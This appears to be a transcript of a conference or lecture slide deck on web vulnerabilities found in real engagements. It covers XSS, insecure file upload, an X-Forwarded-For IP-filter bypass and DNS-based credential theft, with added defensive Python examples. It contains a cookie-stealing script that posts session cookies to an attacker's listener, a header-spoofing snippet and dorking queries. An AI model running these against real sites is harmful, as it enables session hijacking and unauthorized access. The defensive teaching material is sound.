IDAsec copyright - all rights reserved

Web Vulnerabilities in the real world (26 pages)

Upload: matilda-carter

Post on 15-Jan-2016


Page 1: Web Vulnerabilities in the real world

Page 2: About me

@Linkedin – Itzik Moshe
Security Researcher
Co-Founder & CEO of IDAsec
Lecturer - See-Security College

Page 3: Known terms

XSS, SQLi, CSRF, bla bla bla...

Page 4: Study Case #1 - XSS

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. For more details on the different types of XSS flaws

Page 5: Example

Page 6: Example

Page 7: Study Case #1 – XSS

Admin Panel Server
Website Server
No connection between main site & admin panel
Temporary DB / Synchronized DB

Page 8: Contact Us

Page 9: Study Case #1 - XSS

<script>
var c = document.cookie;                          // the victim's cookies for the site
var u = document.URL;                             // the page the victim was on
xmlhttp.open("POST", "myserver/listener", true);  // xmlhttp: an XMLHttpRequest object the slide assumes was created earlier
xmlhttp.send("cookie=" + c + "&url=" + u);        // both values are posted to the listener
</script>
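The server-side half of Study Case #1, as an added example that is not from the slides: the page that reflects user input unescaped (which is what lets the script above run), the same page with output encoding, and a session cookie set HttpOnly so that document.cookie, which the script reads, no longer exposes the session id. Function names and the sample payload are constructed.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample input: the kind of payload the slide's cookie-stealing script is delivered in.
PAYLOAD = '<script>var c = document.cookie;</script>'


def render_vulnerable(search_term: str) -> str:
    """Reflects user input verbatim into the HTML body: the browser parses the <script> tag."""
    return f"<p>Results for: {search_term}</p>"


def render_fixed(search_term: str) -> str:
    """Output encoding for an HTML text-node context: '<' becomes '&lt;', so the same
    payload is rendered as text instead of being executed."""
    return f"<p>Results for: {html.escape(search_term, quote=True)}</p>"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie header for PHPSESSID with HttpOnly, so document.cookie (what the
    script on the slide reads) cannot see the session id even if an XSS does land."""
    c = SimpleCookie()
    c["PHPSESSID"] = session_id
    c["PHPSESSID"]["httponly"] = True
    c["PHPSESSID"]["secure"] = True
    c["PHPSESSID"]["samesite"] = "Lax"   # SameSite support needs Python 3.8+
    c["PHPSESSID"]["path"] = "/"
    return c.output(header="Set-Cookie:")


def contains_active_script(page: str) -> bool:
    """Crude indicator used for the comparison: is there a live <script tag in the output?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))        # the tag survives: XSS
    print(render_fixed(PAYLOAD))             # &lt;script&gt;...: inert text
    print(session_cookie_header("56669e7e1e131dc965ad8e9adc7501e0"))
```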

Page 10: Server Side

Cookie: "PHPSESSID=56669e7e1e131dc965ad8e9adc7501e0"

Url: Victimaddress.com

Page 11: Inject the Cookie

Page 12: Study Case #2 – Insecure Upload

Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.

The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, and simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.

There are really two classes of problems here. The first is with the file metadata, like the path and file name. These are generally provided by the transport, such as HTTP multi-part encoding. This data may trick the application into overwriting a critical file or storing the file in a bad location. You must validate the metadata extremely carefully before using it.

The other class of problem is with the file size or content. The range of problems here depends entirely on what the file is used for. See the examples below for some ideas about how files might be misused. To protect against this type of attack, you should analyze everything your application does with files and think carefully about what processing and interpreters are involved.
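An added example, not from the slides, that checks both classes of problem just described: the metadata (a client-supplied name that may carry a path) and the content (size, extension allowlist, and magic bytes that must match the claimed extension). The allowlist, the 5 MB cap and the upload directory are constructed for illustration.

```python
import os
import posixpath
import re
# Magic bytes for the types this endpoint accepts (constructed allowlist).
ALLOWED = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "pdf": b"%PDF-"}
_UNSAFE = re.compile(r"[^A-Za-z0-9_.-]")

def safe_filename(client_name: str) -> str:
    """Metadata check: drop any directory part ('/' or '\\'), replace odd characters,
    refuse dot-only names, and collapse double extensions (shell.php.png -> shell_php.png)."""
    base = posixpath.basename(client_name.replace("\\", "/"))
    base = _UNSAFE.sub("_", base).lstrip(".")
    if not base:
        raise ValueError("empty filename after sanitising")
    if "." in base:
        stem, ext = base.rsplit(".", 1)
        base = stem.replace(".", "_") + "." + ext
    return base

def check_content(name: str, data: bytes) -> str:
    """Content check: size cap, extension allowlist, and magic bytes that match the
    extension the name claims (a PHP shell renamed .png fails here)."""
    if len(data) > 5 * 1024 * 1024:   # constructed size cap
        raise ValueError("file too large")
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED:
        raise ValueError(f"extension not allowed: {ext!r}")
    if not data.startswith(ALLOWED[ext]):
        raise ValueError(f"content does not look like a .{ext} file")
    return ext

def store_path(upload_dir: str, client_name: str, data: bytes) -> str:
    """Destination path, guaranteed to stay inside upload_dir (serve that directory
    with script execution disabled)."""
    name = safe_filename(client_name)
    check_content(name, data)
    root = os.path.realpath(upload_dir)
    dest = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, dest]) != root:
        raise ValueError("path escapes upload directory")
    return dest

def accepted(upload_dir: str, client_name: str, data: bytes) -> bool:
    try:
        store_path(upload_dir, client_name, data)
        return True
    except ValueError:
        return False
```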

Page 13: Study Case #2 – Insecure Upload

Main Local Server + Temporary DB
Off-line Server + main DB
Website (3rd party)

Page 14: Some Google dorking...

Site:victim.com intext:upload
Site:victim.com inurl:upload
https://www.exploit-db.com/google-hacking-database

Page 15: Phishing

Page 16: Study Case #2 – Insecure Upload

Reverse connection within 3 mins
Inside VPN
IT Manager turned off the entire company after 2 hours
White night (oops...)

Page 17: Study Case #3 – Dumb Mistakes

Page 18: Study Case #3 – Dumb Mistakes

HTTP header IP filter: X-Forwarded-For

Page 19: Study Case #3 – Dumb Mistakes

Login.php~ - list of authorized IP addresses

Page 20: Injecting Header

# Python 2 (urllib2 / cookielib)
import urllib2, cookielib

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
# Header name as sent on the wire. The slide used HTTP_X_FORWARDED_FOR, which is the
# CGI/$_SERVER variable name PHP derives from the header, not the header name itself.
opener.addheaders = [('X-Forwarded-For', '1.2.3.4')]
resp = opener.open('http://example.com/logIP.php')
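The defender's side of this "dumb mistake", as an added example that is not from the slides: the IP filter that believes X-Forwarded-For from anyone (so the request above passes), next to one that only honours the header when the TCP peer is one of our own reverse proxies and walks the chain from the nearest hop. The allowlist, proxy address and function names are constructed.

```python
import ipaddress

AUTHORIZED = {ipaddress.ip_address("1.2.3.4")}         # constructed allowlist (as on the slide)
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}   # constructed: our own reverse proxy


def client_ip_naive(remote_addr: str, headers: dict) -> str:
    """The mistake: take X-Forwarded-For from anyone. The header is client-controlled,
    so any value on the allowlist can simply be supplied in the request."""
    return headers.get("X-Forwarded-For", remote_addr).split(",")[0].strip()


def client_ip_fixed(remote_addr: str, headers: dict) -> str:
    """Only trust the header when the TCP peer is a known proxy; then walk the
    chain from the right and stop at the first hop that is not one of our proxies."""
    peer = ipaddress.ip_address(remote_addr)
    if peer not in TRUSTED_PROXIES:
        return str(peer)                       # direct client: the header means nothing
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break                              # garbage in the chain: trust nothing beyond it
        if addr not in TRUSTED_PROXIES:
            return str(addr)
    return str(peer)


def is_authorized(resolver, remote_addr: str, headers: dict) -> bool:
    """Login.php-style check: is the address the resolver reports on the allowlist?"""
    try:
        return ipaddress.ip_address(resolver(remote_addr, headers)) in AUTHORIZED
    except ValueError:
        return False


if __name__ == "__main__":
    spoof = {"X-Forwarded-For": "1.2.3.4"}  # the header the urllib2 snippet above sends
    print("naive filter lets it in:", is_authorized(client_ip_naive, "203.0.113.9", spoof))
    print("fixed filter lets it in:", is_authorized(client_ip_fixed, "203.0.113.9", spoof))
```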

Page 21: Conclusions

CHEAP OUTSOURCING != SECURITY

Page 22: Case Study #4 – Authentication

Page 23: Local Network DNS Manipulation

Poison DNS response
Attacker runs local PHP proxy
Steal victim's credentials

Page 24: Example

Page 25: Solutions (sort of)

Cookies management
Authentication layers (code)
JavaScript / Ajax solutions

Page 26: Questions?